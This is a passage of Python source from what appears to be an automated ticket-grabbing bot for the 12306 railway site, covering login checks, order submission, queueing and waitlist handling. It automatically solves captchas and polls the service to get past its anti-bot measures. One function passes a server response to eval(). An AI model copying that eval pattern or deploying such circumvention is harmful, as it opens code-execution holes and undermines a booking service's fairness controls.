print(u"车次配置信息有误,或者返回数据异常,请检查 {}".format(station_ticket)) self.session.flag = False return {"code": ticket.FAIL_CODE, "status": False, "cdn": self.httpClint.cdn, } if __name__ == "__main__": q = query() File: inter/CheckUser.py # coding=utf-8 import datetime import random import time import wrapcache from config import configCommon from config.TicketEnmu import ticket class checkUser: def __init__(self, session): self.session = session def sendCheckUser(self): """ 检查用户登录, 检查间隔为2分钟 :return: """ CHENK_TIME = 1 while 1: time.sleep(3) # 防止cpu占用过高 configCommon.checkSleepTime(self.session) # 修复晚上查询线程休眠时,检查登录线程为休眠,造成快豆迅速消耗 if wrapcache.get("user_time") is None: check_user_url = self.session.urls["check_user_url"] data = {"_json_att": ""} check_user = self.session.httpClint.send(check_user_url, data) if check_user.get("data", False): check_user_flag = check_user["data"]["flag"] if check_user_flag is True: wrapcache.set("user_time", datetime.datetime.now(), timeout=random.randint(60, 80) * CHENK_TIME) else: if check_user['messages']: print(ticket.LOGIN_SESSION_FAIL.format(check_user['messages'])) self.session.call_login() wrapcache.set("user_time", datetime.datetime.now(), timeout=random.randint(60, 80) * CHENK_TIME) else: print(ticket.LOGIN_SESSION_FAIL.format(check_user['messages'])) self.session.call_login() wrapcache.set("user_time", datetime.datetime.now(), timeout=random.randint(60, 80) * CHENK_TIME) File: inter/LoginConf.py # coding=utf-8 from config.urlConf import urls def loginConf(session): """ 判断登录是否需要验证码 :param session: :return: """ loginConfUrl = urls.get("loginConf") loginConfRsp = session.httpClint.send(urls=loginConfUrl, data={}) if loginConfRsp and loginConfRsp.get("data", {}).get("is_login_passCode") == "N": print(u"不需要验证码") return False else: print(u"需要验证码") return True if __name__ == '__main__': pass File: inter/ConfirmSingleForQueueAsys.py # coding=utf-8 import json import urllib from collections import OrderedDict from inter.QueryOrderWaitTime import queryOrderWaitTime class confirmSingleForQueueAsys: """ 订单快读排队 """ def __init__(self, session, passengerTicketStr, oldPassengerStr, result, randCode="", ): self.session = session self.passengerTicketStr = passengerTicketStr self.oldPassengerStr = oldPassengerStr self.result = result if isinstance(result, str) else str(result) self.randCode = randCode def data_par(self): """ 字段说明 passengerTicketStr 乘客乘车代码 oldPassengerStr 乘客编号代码 randCode 填空 purpose_codes 学生还是成人 key_check_isChange autoSubmitOrderRequest返回的result字段做切割即可 leftTicketStr autoSubmitOrderRequest返回的result字段做切割即可 train_location autoSubmitOrderRequest返回的result字段做切割即可 choose_seats seatDetailType _json_att :return: """ results = self.result.split("#") key_check_isChange = results[1] leftTicketStr = results[2] train_location = results[0] data = OrderedDict() data["passengerTicketStr"] = self.passengerTicketStr data["oldPassengerStr"] = self.oldPassengerStr data["randCode"] = self.randCode data["purpose_codes"] = "ADULT" data["key_check_isChange"] = key_check_isChange data["leftTicketStr"] = leftTicketStr data["train_location"] = train_location data["choose_seats"] = "" data["seatDetailType"] = "" data["_json_att"] = "" return data def sendConfirmSingleForQueueAsys(self): """ 请求订单快读排队接口 :return: """ urls = self.session.urls["confirmSingleForQueueAsys"] data = self.data_par() confirmSingleForQueueAsysResult = self.session.httpClint.send(urls, data) if confirmSingleForQueueAsysResult.get("status", False) and confirmSingleForQueueAsysResult.get("data", False): queueData = confirmSingleForQueueAsysResult.get("data", {}) if queueData.get("submitStatus", False): qwt = queryOrderWaitTime(session=self.session) qwt.sendQueryOrderWaitTime() else: print(queueData.get("errMsg", "")) File: inter/LiftTicketInit.py # coding=utf-8 import re class liftTicketInit: def __init__(self, session): self.session = session def reqLiftTicketInit(self): """ 请求抢票页面 :return: """ urls = self.session.urls["left_ticket_init"] # 获取初始化的结果 result = self.session.httpClint.send(urls) # 用正则表达式查出CLeftTicketUrl的值 matchObj = re.search('var CLeftTicketUrl = \'(.*)\'', result, re.M|re.I); if matchObj: # 如果有值,替换queryUrl self.session.queryUrl = matchObj.group(1) return { "status": True } File: inter/__init__.py File: inter/PassengerInitApi.py import datetime import wrapcache import TickerConfig from config.urlConf import urls from inter.ConfirmHB import confirmHB class passengerInitApi: def __init__(self, session, secretList, tickerNo): """ 获取候补信息 """ self.secretList = secretList self.tickerNo = tickerNo self.session = session def sendPassengerInitApi(self): passengerInitApiRsp = self.session.httpClint.send(urls.get("passengerInitApi")) if not passengerInitApiRsp.get("status"): print("".join(passengerInitApiRsp.get("messages")) or passengerInitApiRsp.get("validateMessages")) return data = passengerInitApiRsp.get("data", {}) jzdhDateE = data.get("jzdhDateE") if not data.get("jzdhHourE"): wrapcache.set(key=f"hb{self.tickerNo}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) print(f"获取当前候补日期失败,原因: {data.get('jzdhHourE')}") return jzdhHourE = data.get("jzdhHourE").replace(":", "#") jzdhDate = f"{jzdhDateE}#{jzdhHourE}" print(f"当前候补日期为:{jzdhDateE} {jzdhHourE}") confirm = confirmHB(self.secretList, self.session, self.tickerNo, jzdhDate) confirm.sendChechFace() File: inter/SubmitOrderRequest.py # coding=utf-8 import datetime import urllib from collections import OrderedDict import TickerConfig from config.urlConf import urls from inter.CheckOrderInfo import checkOrderInfo from inter.ConfirmHB import confirmHB from inter.PassengerInitApi import passengerInitApi from myException.ticketIsExitsException import ticketIsExitsException def time(): """ 获取日期 :return: """ today = datetime.date.today() return today.strftime('%Y-%m-%d') class submitOrderRequest: def __init__(self, selectObj, secretStr, from_station, to_station, train_no, set_type, passengerTicketStrList, oldPassengerStr, train_date, ticke_peoples): self.session = selectObj # self.secretStr = secretStr try: self.secretStr = urllib.unquote(secretStr) except AttributeError: self.secretStr = urllib.parse.unquote(secretStr) self.from_station = from_station self.to_station = to_station self.to_station = to_station self.train_no = train_no self.set_type = set_type self.passengerTicketStrList = passengerTicketStrList self.oldPassengerStr = oldPassengerStr self.train_date = train_date self.ticke_peoples = ticke_peoples def data_apr(self): """ :return: """ data = [('secretStr', self.secretStr), # 字符串加密 ('train_date', self.train_date), # 出发时间 ('back_train_date', time()), # 返程时间 ('tour_flag', 'dc'), # 旅途类型 ('purpose_codes', 'ADULT'), # 成人票还是学生票 ('query_from_station_name', TickerConfig.FROM_STATION), # 起始车站 ('query_to_station_name', TickerConfig.TO_STATION), # 终点车站 ('undefined', ''), ] return data def sendSubmitOrderRequest(self): """ 提交车次 预定的请求参数,注意参数顺序 注意这里为了防止secretStr被urllib.parse过度编码,在这里进行一次解码 否则调用HttpTester类的post方法将会将secretStr编码成为无效码,造成提交预定请求失败 :param secretStr: 提交车次加密 :return: """ submit_station_url = self.session.urls["submit_station_url"] submitResult = self.session.httpClint.send(submit_station_url, self.data_apr()) if 'data' in submitResult and submitResult['data']: if submitResult['data'] == 'N': coi = checkOrderInfo(self.session, self.train_no, self.set_type, self.passengerTicketStrList, self.oldPassengerStr, self.train_date, self.ticke_peoples) coi.sendCheckOrderInfo() else: print (u'出票失败') elif 'messages' in submitResult and submitResult['messages']: raise ticketIsExitsException(submitResult['messages'][0]) class submitOrderRequestByAfterNate: def __init__(self, session, secretList, tickerNo): """ 提交候补订单 :param secretList: :param session: """ self.secretList = secretList self.session = session self.tickerNo = tickerNo def data_apr(self): """ secretList 9vqa9%2B%2F%2Fsdozmm22hpSeDTGqRUwSuA2D0r%2BmU%2BLZj7MK7CDuf5Ep1xpxl4Dyxfmoah%2BaB9TZSesU%0AkxBbo5oNgR1vqMfvq66VP0T7tpQtH%2BbVGBz1FolZG8jDD%2FHqnz%2FnvdBP416Og6WGS14O%2F3iBSwT8%0AkRPsNF0Vq0U082g0tlJtP%2BPn7TzW3z7TDCceMJIjFcfEOA%2BW%2BuK%2Bpy6jCQMv0TmlkXf5aKcGnE02%0APuv4I8nF%2BOWjWzv9CrJyiCZiWaXd%2Bi7p69V3a9dhF787UgS660%2BqKRFB4RLwAfic3MkAlfpGWhMY%0ACfARVQ%3D%3D#O| _json_att 候补一次只能补一个座位,默认取TICKET_TYPE第一个 :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["secretList"] = f"{self.secretList}#{ticker}|" data["_json_att"] = "" return data def sendSubmitOrderRequest(self, ): submitOrderRequestRsp = self.session.httpClint.send(urls.get("SubmitOrderRequestRsp"), self.data_apr()) if not submitOrderRequestRsp.get("status") or not submitOrderRequestRsp.get("data", {}).get("flag"): print("".join(submitOrderRequestRsp.get("messages")) or submitOrderRequestRsp.get("validateMessages")) return pApi = passengerInitApi(self.session, self.secretList, self.tickerNo) pApi.sendPassengerInitApi() File: inter/ChechFace.py import datetime import urllib from collections import OrderedDict from config.urlConf import urls import TickerConfig from inter.GetSuccessRate import getSuccessRate from myException.ticketConfigException import ticketConfigException import wrapcache class chechFace: def __init__(self, selectObj, secretList, train_no): """ 人脸识别 """ self.secretList = secretList self.session = selectObj self.train_no = train_no def data_apr(self): """ secretList 9vqa9%2B%2F%2Fsdozmm22hpSeDTGqRUwSuA2D0r%2BmU%2BLZj7MK7CDuf5Ep1xpxl4Dyxfmoah%2BaB9TZSesU%0AkxBbo5oNgR1vqMfvq66VP0T7tpQtH%2BbVGBz1FolZG8jDD%2FHqnz%2FnvdBP416Og6WGS14O%2F3iBSwT8%0AkRPsNF0Vq0U082g0tlJtP%2BPn7TzW3z7TDCceMJIjFcfEOA%2BW%2BuK%2Bpy6jCQMv0TmlkXf5aKcGnE02%0APuv4I8nF%2BOWjWzv9CrJyiCZiWaXd%2Bi7p69V3a9dhF787UgS660%2BqKRFB4RLwAfic3MkAlfpGWhMY%0ACfARVQ%3D%3D#O| _json_att 候补一次只能补一个座位,默认取TICKET_TYPE第一个 :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["secretList"] = f"{self.secretList}#{ticker}|" data["_json_att"] = "" return data def sendChechFace(self): chechFaceRsp = self.session.httpClint.send(urls.get("chechFace"), self.data_apr()) if not chechFaceRsp.get("status"): print("".join(chechFaceRsp.get("messages")) or chechFaceRsp.get("validateMessages")) wrapcache.set(key=f"hb{self.train_no}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) return data = chechFaceRsp["data"] if not data.get("face_flag"): print("".join(chechFaceRsp.get("messages")) or chechFaceRsp.get("validateMessages")) if data.get("face_check_code") == "14": """ 未通过人脸核验 """ raise ticketConfigException("通过人证一致性核验的用户及激活的“铁路畅行”会员可以提交候补需求,请您按照操作说明在铁路12306app.上完成人证核验") elif data.get("face_check_code") in ["12", "02"]: """ 系统忙,请稍后再试! """ print("系统忙,请稍后再试!") wrapcache.set(key=f"hb{self.train_no}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) elif data.get("face_check_code") in ["03", "13"]: """ 证件信息审核失败,请检查所填写的身份信息内容与原证件是否一致。 """ raise ticketConfigException("证件信息审核失败,请检查所填写的身份信息内容与原证件是否一致。") elif data.get("face_check_code") in ["01", "11"]: """ 证件信息正在审核中,请您耐心等待,审核通过后可继续完成候补操作。 """ print("证件信息正在审核中,请您耐心等待,审核通过后可继续完成候补操作。") wrapcache.set(key=f"hb{self.train_no}", value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) g = getSuccessRate(self.session, self.secretList) g.sendSuccessRate() File: inter/ConfirmSingleForQueue.py # coding=utf-8 import datetime import time from inter.CheckRandCodeAnsyn import checkRandCodeAnsyn from inter.GetPassengerDTOs import getPassengerDTOs from inter.GetRandCode import getRandCode from inter.QueryOrderWaitTime import queryOrderWaitTime class confirmSingleForQueue: def __init__(self, session, ifShowPassCodeTime, is_node_code, token, set_type, ticket_peoples, ticketInfoForPassengerForm, oldPassengerStr, passengerTicketStrList): self.session = session self.ifShowPassCodeTime = ifShowPassCodeTime self.is_node_code = is_node_code self.token = token self.set_type = set_type self.ticket_peoples = ticket_peoples self.ticketInfoForPassengerForm = ticketInfoForPassengerForm self.passengerTicketStrList = passengerTicketStrList self.oldPassengerStr = oldPassengerStr def data_par(self): """ 模拟提交订单是确认按钮,参数获取方法还是get_ticketInfoForPassengerForm 中获取 :return: """ if not self.passengerTicketStrList and not self.oldPassengerStr: s = getPassengerDTOs(session=self.session, ticket_peoples=self.ticket_peoples, set_type=self.set_type) getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr() if getPassengerDTOsResult.get("status", False): self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "") self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "") data = { "passengerTicketStr": self.passengerTicketStrList.rstrip("_{0}".format(self.set_type)), "oldPassengerStr": "".join(self.oldPassengerStr), "purpose_codes": self.ticketInfoForPassengerForm["purpose_codes"], "key_check_isChange": self.ticketInfoForPassengerForm["key_check_isChange"], "leftTicketStr": self.ticketInfoForPassengerForm["leftTicketStr"], "train_location": self.ticketInfoForPassengerForm["train_location"], "seatDetailType": "", # 开始需要选择座位,但是目前12306不支持自动选择作为,那这个参数为默认 "roomType": "00", # 好像是根据一个id来判断选中的,两种 第一种是00,第二种是10,但是我在12306的页面没找到该id,目前写死是00,不知道会出什么错 "dwAll": "N", "whatsSelect": 1, "_json_at": "", "randCode": "", "choose_seats": "", "REPEAT_SUBMIT_TOKEN": self.token, } return data def sendConfirmSingleForQueue(self): """ # 模拟查询当前的列车排队人数的方法 # 返回信息组成的提示字符串 :return: """ data = self.data_par() checkQueueOrderUrl = self.session.urls["checkQueueOrderUrl"] try: if self.is_node_code: print(u"正在使用自动识别验证码功能") for i in range(3): randCode = getRandCode(is_auto_code=True, auto_code_type=2) checkcode = checkRandCodeAnsyn(self.session, randCode, self.token) if checkcode == 'TRUE': print(u"验证码通过,正在提交订单") data['randCode'] = randCode break else: print (u"验证码有误, {0}次尝试重试".format(i + 1)) print(u"验证码超过限定次数3次,放弃此次订票机会!") else: print(u"不需要验证码") time.sleep(self.ifShowPassCodeTime) checkQueueOrderResult = self.session.httpClint.send(checkQueueOrderUrl, data) if "status" in checkQueueOrderResult and checkQueueOrderResult["status"]: c_data = checkQueueOrderResult["data"] if "data" in checkQueueOrderResult else {} if 'submitStatus' in c_data and c_data['submitStatus'] is True: qow = queryOrderWaitTime(self.session) qow.sendQueryOrderWaitTime() else: if 'errMsg' in c_data and c_data['errMsg']: print(u"提交订单失败,{0}".format(c_data['errMsg'])) else: print(c_data) print(u'订票失败!很抱歉,请重试提交预订功能!') elif "messages" in checkQueueOrderResult and checkQueueOrderResult["messages"]: print(u"提交订单失败,错误信息: " + checkQueueOrderResult["messages"]) else: print(u"提交订单中,请耐心等待:" + checkQueueOrderResult["message"]) except ValueError: print(u"接口 {} 无响应".format(checkQueueOrderUrl)) File: inter/QueryOrderWaitTime.py # coding=utf-8 import copy import time from config.TicketEnmu import ticket from config.emailConf import sendEmail from config.serverchanConf import sendServerChan from myException.ticketIsExitsException import ticketIsExitsException from myException.ticketNumOutException import ticketNumOutException class queryOrderWaitTime: """ 排队 """ def __init__(self, session): self.session = session def sendQueryOrderWaitTime(self): """ 排队获取订单等待信息,每隔3秒请求一次,最高请求次数为20次! :return: """ num = 1 while True: num += 1 if num > ticket.OUT_NUM: print(ticket.WAIT_OUT_NUM) order_id = self.queryMyOrderNoComplete() # 排队失败,自动取消排队订单 if order_id: self.cancelNoCompleteMyOrder(order_id) break try: queryOrderWaitTimeUrl = copy.deepcopy(self.session.urls["queryOrderWaitTimeUrl"]) queryOrderWaitTimeUrl["req_url"] = queryOrderWaitTimeUrl["req_url"].format(int(round(time.time() * 1000))) queryOrderWaitTimeResult = self.session.httpClint.send(queryOrderWaitTimeUrl) except ValueError: queryOrderWaitTimeResult = {} if queryOrderWaitTimeResult: if queryOrderWaitTimeResult.get("status", False): data = queryOrderWaitTimeResult.get("data", False) if data and data.get("orderId", ""): sendEmail(ticket.WAIT_ORDER_SUCCESS.format( data.get("orderId", ""))) sendServerChan(ticket.WAIT_ORDER_SUCCESS.format( data.get("orderId", ""))) raise ticketIsExitsException(ticket.WAIT_ORDER_SUCCESS.format( data.get("orderId"))) elif data.get("msg", False): print(data.get("msg", "")) break elif data.get("waitTime", False): print(ticket.WAIT_ORDER_CONTINUE.format(0 - data.get("waitTime", False))) else: pass elif queryOrderWaitTimeResult.get("messages", False): print(ticket.WAIT_ORDER_FAIL.format(queryOrderWaitTimeResult.get("messages", ""))) else: print(ticket.WAIT_ORDER_NUM.format(num + 1)) else: pass time.sleep(2) else: print(ticketNumOutException(ticket.WAIT_ORDER_SUB_FAIL)) def queryMyOrderNoComplete(self): """ 获取订单列表信息 :return: """ self.initNoComplete() queryMyOrderNoCompleteUrl = self.session.urls["queryMyOrderNoCompleteUrl"] data = {"_json_att": ""} try: queryMyOrderNoCompleteResult = self.session.httpClint.send(queryMyOrderNoCompleteUrl, data) except ValueError: queryMyOrderNoCompleteResult = {} if queryMyOrderNoCompleteResult: if queryMyOrderNoCompleteResult.get("data", False) and queryMyOrderNoCompleteResult["data"].get("orderDBList", False): return queryMyOrderNoCompleteResult["data"] elif queryMyOrderNoCompleteResult.get("data", False) and queryMyOrderNoCompleteResult["data"].get("orderCacheDTO", False): if queryMyOrderNoCompleteResult["data"]["orderCacheDTO"].get("message", False): print(queryMyOrderNoCompleteResult["data"]["orderCacheDTO"]["message"]["message"]) raise ticketNumOutException( queryMyOrderNoCompleteResult["data"]["orderCacheDTO"]["message"]["message"]) else: if queryMyOrderNoCompleteResult.get("message", False): print(queryMyOrderNoCompleteResult.get("message", False)) return False else: return False else: return False def initNoComplete(self): """ 获取订单前需要进入订单列表页,获取订单列表页session :return: """ initNoCompleteUrl = self.session.urls["initNoCompleteUrl"] data = {"_json_att": ""} self.session.httpClint.send(initNoCompleteUrl, data) def cancelNoCompleteMyOrder(self, sequence_no): """ 取消订单 :param sequence_no: 订单编号 :return: """ cancelNoCompleteMyOrderUrl = self.session.urls["cancelNoCompleteMyOrder"] cancelNoCompleteMyOrderData = { "sequence_no": sequence_no, "cancel_flag": "cancel_order", "_json_att": "" } cancelNoCompleteMyOrderResult = self.session.httpClint.send(cancelNoCompleteMyOrderUrl, cancelNoCompleteMyOrderData) if cancelNoCompleteMyOrderResult.get("data", False) and cancelNoCompleteMyOrderResult["data"].get("existError", "N"): print(ticket.CANCEL_ORDER_SUCCESS.format(sequence_no)) time.sleep(2) return True else: print(ticket.CANCEL_ORDER_FAIL.format(sequence_no)) return False File: inter/GetRepeatSubmitToken.py # coding=utf-8 import json import re class getRepeatSubmitToken: def __init__(self, session): self.session = session def sendGetRepeatSubmitToken(self): """ 获取提交车票请求token :return: token """ initdc_url = self.session.urls["initdc_url"] initdc_result = self.session.httpClint.send(initdc_url, ) token_name = re.compile(r"var globalRepeatSubmitToken = '(\S+)'") ticketInfoForPassengerForm_name = re.compile(r'var ticketInfoForPassengerForm=(\{.+\})?') order_request_params_name = re.compile(r'var orderRequestDTO=(\{.+\})?') token = re.search(token_name, initdc_result).group(1) re_tfpf = re.findall(ticketInfoForPassengerForm_name, initdc_result) re_orp = re.findall(order_request_params_name, initdc_result) if re_tfpf: ticketInfoForPassengerForm = json.loads(re_tfpf[0].replace("'", '"')) else: ticketInfoForPassengerForm = "" if re_orp: order_request_params = json.loads(re_orp[0].replace("'", '"')) else: order_request_params = "" return { "token": token, "ticketInfoForPassengerForm": ticketInfoForPassengerForm, "order_request_params": order_request_params, "session": self.session } File: inter/GetPassCodeNewOrderAndLogin.py # coding=utf-8 import base64 import copy import random def getPassCodeNewOrderAndLogin(session, imgType): """ 下载验证码 :param session: :param imgType: 下载验证码类型,login=登录验证码,其余为订单验证码 :return: """ if imgType == "login": codeImgUrl = copy.deepcopy(session.urls["getCodeImg"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) else: codeImgUrl = copy.deepcopy(session.urls["codeImgByOrder"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) print(u"下载验证码...") img_path = './tkcode.png' result = session.httpClint.send(codeImgUrl) try: if isinstance(result, dict): print(u"下载验证码失败, 请手动检查是否ip被封,或者重试,请求地址:https://kyfw.12306.cn{}".format(codeImgUrl.get("req_url"))) return False else: print(u"下载验证码成功") try: with open(img_path, 'wb', encoding="utf-8") as img: img.write(result) except Exception: with open(img_path, 'wb') as img: img.write(result) return result except OSError: print(u"验证码下载失败,可能ip被封,确认请手动请求: {0}".format(codeImgUrl)) def getPassCodeNewOrderAndLogin1(session, imgType): """ 获取验证码2 :param session: :param imgType: :return: """ if imgType == "login": codeImgUrl = copy.deepcopy(session.urls["getCodeImg1"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) else: codeImgUrl = copy.deepcopy(session.urls["codeImgByOrder"]) codeImgUrl["req_url"] = codeImgUrl["req_url"].format(random.random()) print(u"下载验证码...") img_path = './tkcode.png' codeImgUrlRsp = session.httpClint.send(codeImgUrl) if not isinstance(codeImgUrlRsp, str): print("验证码获取失败") return result = eval(codeImgUrlRsp.split("(")[1].split(")")[0]).get("image") try: if isinstance(result, dict): print(u"下载验证码失败, 请手动检查是否ip被封,或者重试,请求地址:https://kyfw.12306.cn{}".format(codeImgUrl.get("req_url"))) return False else: print(u"下载验证码成功") try: with open(img_path, 'wb', encoding="utf-8") as img: img.write(result) except Exception: with open(img_path, 'wb') as img: img.write(base64.b64decode(result)) return result except OSError: print(u"验证码下载失败,可能ip被封或者文件写入没权限") if __name__ == '__main__': pass File: inter/GetQueueCount.py # coding=utf-8 import datetime import sys import time from collections import OrderedDict import wrapcache import TickerConfig from config.TicketEnmu import ticket from config.emailConf import sendEmail from config.serverchanConf import sendServerChan from config.urlConf import urls from inter.ConfirmSingleForQueue import confirmSingleForQueue from myException.ticketIsExitsException import ticketIsExitsException def conversion_int(str): return int(str) class getQueueCount: def __init__(self, session, is_need_code, ifShowPassCodeTime, set_type, station_dates, train_no, ticket_peoples, ticketInfoForPassengerForm, token, oldPassengerStr, passengerTicketStrList): self.station_dates = station_dates self.session = session self.is_need_code = is_need_code self.ifShowPassCodeTime = ifShowPassCodeTime self.set_type = set_type self.train_no = train_no self.ticket_peoples = ticket_peoples self.ticket_black_list = {} self.ticketInfoForPassengerForm = ticketInfoForPassengerForm self.token = token self.oldPassengerStr = oldPassengerStr self.passengerTicketStrList = passengerTicketStrList def data_par(self): """ 参数结构 自动提交代码接口-autoSubmitOrderRequest - 字段说明 - secretStr 车票代码 - train_date 乘车日期 - tour_flag 乘车类型 - purpose_codes 学生还是成人 - query_from_station_name 起始车站 - query_to_station_name 结束车站 - cancel_flag 默认2,我也不知道干嘛的 - bed_level_order_num 000000000000000000000000000000 - passengerTicketStr 乘客乘车代码 - oldPassengerStr 乘客编号代码 :return: """ if sys.version_info.major is 2: new_train_date = filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" ")) else: new_train_date = list(filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" "))) data = OrderedDict() data['train_date'] = "{0} {1} {2} {3} 00:00:00 GMT+0800 (中国标准时间)".format( new_train_date[0], new_train_date[1], new_train_date[2] if len(new_train_date[2]) is 2 else f"0{new_train_date[2]}", new_train_date[4], ), data['train_no'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO']['train_no'], data['stationTrainCode'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO'][ 'station_train_code'], data['seatType'] = self.set_type, data['fromStationTelecode'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO'][ 'from_station'], data['toStationTelecode'] = self.ticketInfoForPassengerForm['queryLeftTicketRequestDTO']['to_station'], data['leftTicket'] = self.ticketInfoForPassengerForm['leftTicketStr'], data['purpose_codes'] = self.ticketInfoForPassengerForm['purpose_codes'], data['train_location'] = self.ticketInfoForPassengerForm['train_location'], data['REPEAT_SUBMIT_TOKEN'] = self.token, return data def sendGetQueueCount(self): """ # 模拟查询当前的列车排队人数的方法 # 返回信息组成的提示字符串 :return: """ getQueueCountResult = self.session.httpClint.send(self.session.urls["getQueueCountUrl"], self.data_par()) if "status" in getQueueCountResult and getQueueCountResult["status"] is True: if "countT" in getQueueCountResult["data"]: ticket = getQueueCountResult["data"]["ticket"] ticket_split = sum(map(conversion_int, ticket.split(","))) if ticket.find(",") != -1 else ticket countT = getQueueCountResult["data"]["countT"] if int(ticket_split) is 0: wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) print(f"排队失败,当前余票数还剩: {ticket_split} 张") return print(u"排队成功, 你排在: {1}位, 当前余票还剩余: {0} 张".format(ticket_split, countT)) csf = confirmSingleForQueue(self.session, self.ifShowPassCodeTime, self.is_need_code, self.token, self.set_type, self.ticket_peoples, self.ticketInfoForPassengerForm, self.oldPassengerStr, self.passengerTicketStrList) csf.sendConfirmSingleForQueue() # else: # print(u"当前排队人数: {1} 当前余票还剩余:{0} 张,继续排队中".format(ticket_split, countT)) else: print(u"排队发现未知错误{0},将此列车 {1}加入小黑屋".format(getQueueCountResult, self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) elif "messages" in getQueueCountResult and getQueueCountResult["messages"]: print(u"排队异常,错误信息:{0}, 将此列车 {1}加入小黑屋".format(getQueueCountResult["messages"][0], self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) else: if "validateMessages" in getQueueCountResult and getQueueCountResult["validateMessages"]: print(str(getQueueCountResult["validateMessages"])) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) else: print(u"未知错误 {0}".format("".join(getQueueCountResult))) class queryQueueByAfterNate: def __init__(self, session): """ 候补排队 :param session: """ self.session = session def sendQueryQueueByAfterNate(self): for i in range(10): queryQueueByAfterNateRsp = self.session.httpClint.send(urls.get("queryQueue")) if not queryQueueByAfterNateRsp.get("status"): print("".join(queryQueueByAfterNateRsp.get("messages")) or queryQueueByAfterNateRsp.get("validateMessages")) time.sleep(1) else: sendEmail(ticket.WAIT_ORDER_SUCCESS) sendServerChan(ticket.WAIT_ORDER_SUCCESS) raise ticketIsExitsException(ticket.WAIT_AFTER_NATE_SUCCESS) if __name__ == '__main__': new_train_date = list(filter(None, str(time.asctime(time.strptime("2019-10-07", "%Y-%m-%d"))).split(" "))) print(new_train_date) train_date = "{0} {1} {2} {3} 00:00:00 GMT+0800 (中国标准时间)".format( new_train_date[0], new_train_date[1], new_train_date[2] if len(new_train_date[2]) is 2 else f"0{new_train_date[2]}", new_train_date[4], ) print(train_date) File: inter/AutoSubmitOrderRequest.py # coding=utf-8 import urllib from collections import OrderedDict from config.TicketEnmu import ticket from inter.CheckRandCodeAnsyn import checkRandCodeAnsyn from inter.GetQueueCountAsync import getQueueCountAsync from inter.GetRandCode import getRandCode import TickerConfig class autoSubmitOrderRequest: """ 快读提交订单通道 """ def __init__(self, selectObj, secretStr, train_date, query_from_station_name, query_to_station_name, passengerTicketStr, oldPassengerStr, train_no, stationTrainCode, leftTicket, set_type,): self.set_type = set_type try: self.secretStr = urllib.unquote(secretStr) except AttributeError: self.secretStr = urllib.parse.unquote(secretStr) self.train_date = train_date self.query_from_station_name = query_from_station_name self.query_to_station_name = query_to_station_name self.passengerTicketStr = passengerTicketStr.rstrip("_{0}".format(self.set_type)) self.oldPassengerStr = oldPassengerStr self.session = selectObj self.train_no = train_no self.stationTrainCode = stationTrainCode self.leftTicket = leftTicket def data_par(self): """ 参数结构 自动提交代码接口-autoSubmitOrderRequest - 字段说明 - secretStr 车票代码 - train_date 乘车日期 - tour_flag 乘车类型 - purpose_codes 学生还是成人 - query_from_station_name 起始车站 - query_to_station_name 结束车站 - cancel_flag 默认2,我也不知道干嘛的 - bed_level_order_num 000000000000000000000000000000 - passengerTicketStr 乘客乘车代码 - oldPassengerStr 乘客编号代码 :return: """ data = OrderedDict() data["secretStr"] = self.secretStr data["train_date"] = self.train_date data["tour_flag"] = "dc" data["purpose_codes"] = "ADULT" data["query_from_station_name"] = TickerConfig.FROM_STATION data["query_to_station_name"] = TickerConfig.TO_STATION data["cancel_flag"] = 2 data["bed_level_order_num"] = "000000000000000000000000000000" data["passengerTicketStr"] = self.passengerTicketStr data["oldPassengerStr"] = self.oldPassengerStr return data def sendAutoSubmitOrderRequest(self): """ 请求下单接口 :return: """ urls = self.session.urls["autoSubmitOrderRequest"] data = self.data_par() autoSubmitOrderRequestResult = self.session.httpClint.send(urls, data) if autoSubmitOrderRequestResult and \ autoSubmitOrderRequestResult.get("status", False) and\ autoSubmitOrderRequestResult.get("httpstatus", False) == 200: requestResultData = autoSubmitOrderRequestResult.get("data", {}) if requestResultData: result = requestResultData.get("result", "") ifShowPassCode = requestResultData.get("ifShowPassCode", "N") ifShowPassCodeTime = int(requestResultData.get("ifShowPassCodeTime", "1000")) / float(1000) print(ticket.AUTO_SUBMIT_ORDER_REQUEST_C) g = getQueueCountAsync(session=self.session, train_no=self.train_no, stationTrainCode=self.stationTrainCode, fromStationTelecode=self.query_from_station_name, toStationTelecode=self.query_to_station_name, leftTicket=self.leftTicket, set_type=self.set_type, users=len(TickerConfig.TICKET_PEOPLES), station_dates=self.train_date, passengerTicketStr=self.passengerTicketStr, oldPassengerStr=self.oldPassengerStr, result=result, ifShowPassCodeTime=ifShowPassCodeTime, ) if ifShowPassCode == "Y": # 如果需要验证码 print(u"需要验证码") print(u"正在使用自动识别验证码功能") for i in range(3): randCode = getRandCode(is_auto_code=True, auto_code_type=2) checkcode = checkRandCodeAnsyn(self.session, randCode, "") if checkcode == 'TRUE': print(u"验证码通过,正在提交订单") data['randCode'] = randCode break else: print (u"验证码有误, {0}次尝试重试".format(i + 